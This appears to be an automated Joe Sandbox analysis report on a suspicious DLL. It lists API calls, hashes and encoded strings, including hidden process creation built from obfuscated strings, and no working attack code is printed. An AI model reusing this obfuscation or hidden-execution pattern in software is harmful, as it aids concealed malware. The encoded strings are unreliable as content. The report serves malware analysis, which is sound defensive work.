                • API ID: _strlen$Sleep$AddressCreateEnvironmentFileFindFirstHandleModuleProcProcessVariable
                • String ID: %s%s$%s%s$%s%s$VtAuBDZBgBA0BDFB`dAoBEtBRtApBDFB`tAyBDVB`tA`BFNBWBAWBFhBQBA`BKpBNBAjBGhBNRAkBG`BMBAjB@3BZRAhBG`BZtBwBGRBZRB6BDRBORAjBGVBMdByB@3BNdB6BDVBYRAnBGhBNRB1BG`BNRB0BGJBeRA`BFhBadAtBKJBatAiBENBYRAzBKZBYRAzBGNBNdB>$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBRtAzBKhB`BA3BD;B[BAiBKJBfRAtBKRBLBB1B@7BYBAkBKRB$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>$[BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB$gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>
                • API String ID: 405535372-2132796354
                • Opcode ID: c204671a4d5e5b8c22c43bd213b84e4cfe33b495e8799ec3bd81a89ba71fe9a0
                • Instruction ID: 73e30f6645525a1c54cbd50ef7894b6c9cb25dd10adf6a9621a040bc308ca4aa
                • Opcode Fuzzy Hash: c204671a4d5e5b8c22c43bd213b84e4cfe33b495e8799ec3bd81a89ba71fe9a0
                • Instruction Fuzzy Hash: D2A138B2C4025CABDF31DBB8DC86FDD7BB8AF1920CF104025E914A7286EB3992158F55

                Control-flow Graph

                APIs
                • _strlen.LIBCMT ref: 6B9219BD
                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6B9474C4), ref: 6B921A5E
                • _strlen.LIBCMT ref: 6B921AC4
                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6B9474E0), ref: 6B921B60
                Strings
                • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB, xrefs: 6B921AA4
                • `dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>, xrefs: 6B92199D
                • %s %s, xrefs: 6B921A24
                • %s %s, xrefs: 6B921B26
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: CreateProcess_strlen
                • String ID: %s %s$%s %s$`dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB
                • API String ID: 3222040079-4228346574
                • Opcode ID: 0ec4928c7e7e4d673e1eae0b37eb57f345344c797c0f595e4af2d3bbd3a47c0b
                • Instruction ID: 8e7822752293f62d2feb15488c76926c28e4373ea49bafa1c58a4ea7522ba39a
                • Opcode Fuzzy Hash: 0ec4928c7e7e4d673e1eae0b37eb57f345344c797c0f595e4af2d3bbd3a47c0b
                • Instruction Fuzzy Hash: 5F516071D5024CABEB20DBB4DC42FDD77B8AF1570CF140025E614EA186EBB9E6148B65

                Control-flow Graph

                APIs
                • __RTC_Initialize.LIBCMT ref: 6B924CEA
                • ___scrt_uninitialize_crt.LIBCMT ref: 6B924D04
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: Initialize___scrt_uninitialize_crt
                • String ID:
                • API String ID: 2442719207-0
                • Opcode ID: a8db96b3f68fede142adb9981642cb3d21ae0f1cb3877fa1b21e0522104e8654
                • Instruction ID: b6e57b65ade0c133a72dde679e227e4e8048e8a8daf3721929caeab953e4ed0d
                • Opcode Fuzzy Hash: a8db96b3f68fede142adb9981642cb3d21ae0f1cb3877fa1b21e0522104e8654
                • Instruction Fuzzy Hash: CF41E272D24624AFEB119F68CC41BAE7BA8EF91B58F014155EA146735CD738DD018FE0

                Control-flow Graph

                Control-flow graph of the function at 6b924d53 (rendered graph not reproduced; executed and not-executed blocks are distinguished only in the image). Its blocks call dllmain_raw and dllmain_crt_dispatch and the functions at 6b921000 and 6b924ca3, i.e. this is the DllMain dispatch wrapper.
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: dllmain_raw$dllmain_crt_dispatch
                • String ID:
                • API String ID: 3136044242-0
                • Opcode ID: 0732268a67b247a0e7c1b0cb0901112ae1c37e0af4b8a850df3c23f3c36f9d3f
                • Instruction ID: ce7cc07099c18a497944fa6da52c97b08fcff70d4221a9d8e28422aca8c2b582
                • Opcode Fuzzy Hash: 0732268a67b247a0e7c1b0cb0901112ae1c37e0af4b8a850df3c23f3c36f9d3f
                • Instruction Fuzzy Hash: 0F218071D10625AFEB214F65CC41A6F3A69EB85A98B014155FE2857318D339DE018FE0

                Control-flow Graph

                APIs
                • __RTC_Initialize.LIBCMT ref: 6B924BE9
                  • Part of subcall function 6B9250D5: RtlInitializeSListHead.KERNEL32(6B946DC0,6B924BF3,6B9441F8,00000010,6B924B84,?,?,?,6B924DAC,?,00000001,?,?,00000001,?,6B944240), ref: 6B9250DA
                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6B924C53
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                • String ID:
                • API String ID: 3231365870-0
                • Opcode ID: b6a72d304883c8d258b923b2589df85b0894e918534115330e9d608ed15e218b
                • Instruction ID: 5aec498df37c5461c11c63761ef7969e335287be0ee9519e1e0c053f2a50f735
                • Opcode Fuzzy Hash: b6a72d304883c8d258b923b2589df85b0894e918534115330e9d608ed15e218b
                • Instruction Fuzzy Hash: E321F371EA8201ABDB19EFB898167DC37A59F2332CF008499D641273CDDB7DD044DA62

                Control-flow Graph

                Control-flow graph of the function at 6b930258 (rendered graph not reproduced; executed and not-executed blocks are distinguished only in the image). Its blocks call GetStdHandle and GetFileType, the CRT's standard-handle initialisation.
                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 6B9302A4
                • GetFileType.KERNELBASE(00000000), ref: 6B9302B6
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: FileHandleType
                • String ID:
                • API String ID: 3000768030-0
                • Opcode ID: 17ac3094462a3919286bdeed36754eb124592eba934e5aef9f9c9d97c16cb0a5
                • Instruction ID: 98619f29e87463e0b406f706244dd55b29cf41d60b34c8eceaf3705e24040df7
                • Opcode Fuzzy Hash: 17ac3094462a3919286bdeed36754eb124592eba934e5aef9f9c9d97c16cb0a5
                • Instruction Fuzzy Hash: A21193716487A24AC7228A3E8CC4712BB98AB4B770B34079AD4B6965F1C738D886C342

                Control-flow Graph

                Control-flow graph of the function at 6b931658 (rendered graph not reproduced; executed and not-executed blocks are distinguished only in the image). Its blocks call RtlAllocateHeap and the functions at 6b935ac9, 6b92df8f and 6b930431 (__dosmaperr), the CRT's malloc path.
                APIs
                • RtlAllocateHeap.NTDLL(00000008,6B921775,6B92C75A,?,6B92F6DC,00000001,00000364,00000007,000000FF,6B92C75A,6B92C75A,?,6B928182,6B92DE7A,F08BD84D), ref: 6B931699
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 350ca9f6db5dba3064255ced565cb56368c9c61ba2b6a71d8daf4c85f09b7364
                • Instruction ID: 61acf84c31470fcfc314ac724711db85dea3bd4baed3f968ba4f1c76393044d4
                • Opcode Fuzzy Hash: 350ca9f6db5dba3064255ced565cb56368c9c61ba2b6a71d8daf4c85f09b7364
                • Instruction Fuzzy Hash: 06F059319445346BEB105AB68804B6A375C9F437ACB098161EC14D61A0CB3CD48086E2

                Control-flow Graph

                Control-flow graph of the function at 6b921000 (rendered graph not reproduced; executed and not-executed blocks are distinguished only in the image). Its blocks call the function at 6b924402 and then ExitProcess, so the host process terminates once this routine returns.
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                • Opcode ID: c0aaccb24c97c0b6e4e78997a3cd543fda10fcc56bdf7bec65950323869da43b
                • Instruction ID: 25181765ccabb753b88994d2f82c29c133a3e757ae94da95a215f95797e2db4e
                • Opcode Fuzzy Hash: c0aaccb24c97c0b6e4e78997a3cd543fda10fcc56bdf7bec65950323869da43b
                • Instruction Fuzzy Hash: 6BD02230CA9228FBCF0CABB4C406B0D73E8EF0F710F008020EA1487300C239CA00A922
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: __floor_pentium4
                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                • API String ID: 4168288129-2761157908
                • Opcode ID: d976abd30eb9d49bf9b6ec06300b6f49cffbdefb9cb3c9e42cc9004f95e1013d
                • Instruction ID: d05f21215c794a634dd2061b2e706e2f623c362f4078f5ff53b353693908932a
                • Opcode Fuzzy Hash: d976abd30eb9d49bf9b6ec06300b6f49cffbdefb9cb3c9e42cc9004f95e1013d
                • Instruction Fuzzy Hash: 7BD23871E082298FDB65CE28CD40BDAB7B9EB45305F1441EAD84DE7240EB79AE85CF41
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 10941fa296378a8a5a9f7a9e3a6299de1727250a8a886395a75c3011d5e11ab4
                • Instruction ID: 72cb15e5ac9403e82a56f141f29b12f3bca43025b52b9abf62c9922df864bbbd
                • Opcode Fuzzy Hash: 10941fa296378a8a5a9f7a9e3a6299de1727250a8a886395a75c3011d5e11ab4
                • Instruction Fuzzy Hash: 70024B71E052299BDB14CFA9C880B9EFBF5FF49314F2482A9D919E7340D735AA41CB90
                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6B9253FA
                • IsDebuggerPresent.KERNEL32 ref: 6B9254C6
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6B9254DF
                • UnhandledExceptionFilter.KERNEL32(?), ref: 6B9254E9
                APIs
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,6B921775), ref: 6B92DDF5
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,6B921775), ref: 6B92DDFF
                • UnhandledExceptionFilter.KERNEL32(6B92144D,?,?,?,?,?,6B921775), ref: 6B92DE0C
                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6B93B864,?,?,00000008,?,?,6B93B467,00000000), ref: 6B93BA96
                APIs
                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6B925601
                Strings
                • QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>, xrefs: 6B921765
                • QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>, xrefs: 6B921887
                • QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>, xrefs: 6B9217F6
                • kernel32.dll, xrefs: 6B921755
                APIs
                  • Part of subcall function 6B937FC0: CreateFileW.KERNEL32(00000000,00000000,?,6B938322,?,?,00000000,?,6B938322,00000000,0000000C), ref: 6B937FDD
                • GetLastError.KERNEL32 ref: 6B93838D
                • __dosmaperr.LIBCMT ref: 6B938394
                • GetFileType.KERNEL32(00000000), ref: 6B9383A0
                • GetLastError.KERNEL32 ref: 6B9383AA
                • __dosmaperr.LIBCMT ref: 6B9383B3
                • CloseHandle.KERNEL32(00000000), ref: 6B9383D3
                • CloseHandle.KERNEL32(00000000), ref: 6B938520
                • GetLastError.KERNEL32 ref: 6B938552
                • __dosmaperr.LIBCMT ref: 6B938559
                APIs
                • type_info::operator==.LIBVCRUNTIME ref: 6B926BF9
                • ___TypeMatch.LIBVCRUNTIME ref: 6B926D07
                • _UnwindNestedFrames.LIBCMT ref: 6B926E59
                • CallUnexpected.LIBVCRUNTIME ref: 6B926E74
                APIs
                • _ValidateLocalCookies.LIBCMT ref: 6B926577
                • ___except_validate_context_record.LIBVCRUNTIME ref: 6B92657F
                • _ValidateLocalCookies.LIBCMT ref: 6B926608
                • __IsNonwritableInCurrentImage.LIBCMT ref: 6B926633
                • _ValidateLocalCookies.LIBCMT ref: 6B926688
                APIs
                • FreeLibrary.KERNEL32(00000000,?,6B931812,6B927D84,B586E81C,00000000,6B92C75A,00000000,?,6B93198B,00000022,FlsSetValue,6B93F4F8,ccs,6B92C75A), ref: 6B9317C4
                APIs
                • GetLastError.KERNEL32(00000001,?,6B926721,6B9251C4,6B924B74,?,6B924DAC,?,00000001,?,?,00000001,?,6B944240,0000000C,6B924EA5), ref: 6B9267B1
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6B9267BF
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6B9267D8
                • SetLastError.KERNEL32(00000000,6B924DAC,?,00000001,?,?,00000001,?,6B944240,0000000C,6B924EA5,?,00000001,?), ref: 6B92682A
                Strings
                • C:\Windows\system32\loaddll32.exe, xrefs: 6B933E14
                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FB32F76A,6B92C75A,?,00000000,6B93C710,000000FF,?,6B92E3C3,B586E81C,?,6B92E397,?), ref: 6B92E45E
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6B92E470
                • FreeLibrary.KERNEL32(00000000,?,00000000,6B93C710,000000FF,?,6B92E3C3,B586E81C,?,6B92E397,?), ref: 6B92E492
                APIs
                • __alloca_probe_16.LIBCMT ref: 6B938D79
                • __alloca_probe_16.LIBCMT ref: 6B938E42
                • __freea.LIBCMT ref: 6B938EA9
                  • Part of subcall function 6B93047E: RtlAllocateHeap.KERNEL32(00000000,6B934371,7D32887D,?,6B934371,00000220,?,6B921775,7D32887D), ref: 6B9304B0
                • __freea.LIBCMT ref: 6B938EBC
                • __freea.LIBCMT ref: 6B938EC9
                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6B927863,00000000,?,00000001,?,?,?,6B927952,00000001,FlsFree,6B93DCE0,FlsFree), ref: 6B9278BF
                • GetLastError.KERNEL32(?,6B927863,00000000,?,00000001,?,?,?,6B927952,00000001,FlsFree,6B93DCE0,FlsFree,00000000,?,6B926878), ref: 6B9278C9
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6B9278F1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID: api-ms-
                • API String ID: 3177248105-2084034818
                • Opcode ID: aad5e9a581f097f0104f3c62fe998473158f2a9d2a84a25f880a9eb89a918e8c
                • Instruction ID: b2ef149497753960300170237b5ab8f9198c92de32f7bb3b8371807c071ae1d1
                • Opcode Fuzzy Hash: aad5e9a581f097f0104f3c62fe998473158f2a9d2a84a25f880a9eb89a918e8c
                • Instruction Fuzzy Hash: 25E04F30A98309B7EF112F71DD46B493F69AF02B44F504470F90DF9195EB79D861C985
                APIs
                • GetConsoleOutputCP.KERNEL32(FB32F76A,00000000,00000000,?), ref: 6B932649
                  • Part of subcall function 6B934945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6B938E9F,?,00000000,-00000008), ref: 6B9349A6
                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6B93289B
                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6B9328E1
                • GetLastError.KERNEL32 ref: 6B932984
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                • String ID:
                • API String ID: 2112829910-0
                • Opcode ID: 1f9315c600466f72c7746dc853051df72928a2955d50ec746d3b6d6b79931618
                • Instruction ID: 47e99add74c7a9bebca7aa54ae920c7b85d95ed588e90b813f86614056dd3e9c
                • Opcode Fuzzy Hash: 1f9315c600466f72c7746dc853051df72928a2955d50ec746d3b6d6b79931618
                • Instruction Fuzzy Hash: D0D18A75D04269AFCB05CFA8C990AEDBBB9FF09314F24416AE425EB351E634E941CB90
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: AdjustPointer
                • String ID:
                • API String ID: 1740715915-0
                • Opcode ID: 782db5b2eb21bf65be25ad7246cb58a5a8e24fc9746911b45e708c0af9fee007
                • Instruction ID: d69143cf712d773978987428d441a5f490b7318c3b0a2b5b469c7e3991dc8116
                • Opcode Fuzzy Hash: 782db5b2eb21bf65be25ad7246cb58a5a8e24fc9746911b45e708c0af9fee007
                • Instruction Fuzzy Hash: D251157AD25602EFEB188F65C442B6A73B8FF51718F10416DE85147A99EB39E840CB90
                APIs
                  • Part of subcall function 6B934945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6B938E9F,?,00000000,-00000008), ref: 6B9349A6
                • GetLastError.KERNEL32 ref: 6B9336F8
                • __dosmaperr.LIBCMT ref: 6B9336FF
                • GetLastError.KERNEL32(?,?,?,?), ref: 6B933739
                • __dosmaperr.LIBCMT ref: 6B933740
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                • String ID:
                • API String ID: 1913693674-0
                • Opcode ID: d721eb1561ac68d40d3e969f71b4eac05a28fe267b63ac8149127c80e2c25ecc
                • Instruction ID: 3f386d64c9326600096316c7d369e1861d961667d6eb4cb77a56dc2c90bdc72a
                • Opcode Fuzzy Hash: d721eb1561ac68d40d3e969f71b4eac05a28fe267b63ac8149127c80e2c25ecc
                • Instruction Fuzzy Hash: 8621C27168C225AFD7309F76C88195BB7BDEF0176C7008558ED2A97660E738EC418B90
                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 6B9349F0
                  • Part of subcall function 6B934945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6B938E9F,?,00000000,-00000008), ref: 6B9349A6
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6B934A28
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6B934A48
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                • String ID:
                • API String ID: 158306478-0
                • Opcode ID: ebafa3aa9de179e2c063b82ca69362ac408cc86dd4d4602a067ea5de0a7d218d
                • Instruction ID: e44686522afb4796f0e219440eeec1c0f850a0a81e1c8b75e2baf6af0378b2ca
                • Opcode Fuzzy Hash: ebafa3aa9de179e2c063b82ca69362ac408cc86dd4d4602a067ea5de0a7d218d
                • Instruction Fuzzy Hash: DC11D6B29055357F6B6197F69CCDD6F2EACCE96AAC3020124F505D1301FB2ACE0189B6
                APIs
                • WriteConsoleW.KERNEL32(00000000,00000000,6B92D16B,00000000,00000000,?,6B9385E1,00000000,00000001,?,?,?,6B9329D8,?,00000000,00000000), ref: 6B939F64
                • GetLastError.KERNEL32(?,6B9385E1,00000000,00000001,?,?,?,6B9329D8,?,00000000,00000000,?,?,?,6B932FB2,00000000), ref: 6B939F70
                  • Part of subcall function 6B939F36: CloseHandle.KERNEL32(FFFFFFFE,6B939F80,?,6B9385E1,00000000,00000001,?,?,?,6B9329D8,?,00000000,00000000,?,?), ref: 6B939F46
                • ___initconout.LIBCMT ref: 6B939F80
                  • Part of subcall function 6B939EF8: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6B939F27,6B9385CE,?,?,6B9329D8,?,00000000,00000000,?), ref: 6B939F0B
                • WriteConsoleW.KERNEL32(00000000,00000000,6B92D16B,00000000,?,6B9385E1,00000000,00000001,?,?,?,6B9329D8,?,00000000,00000000,?), ref: 6B939F95
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
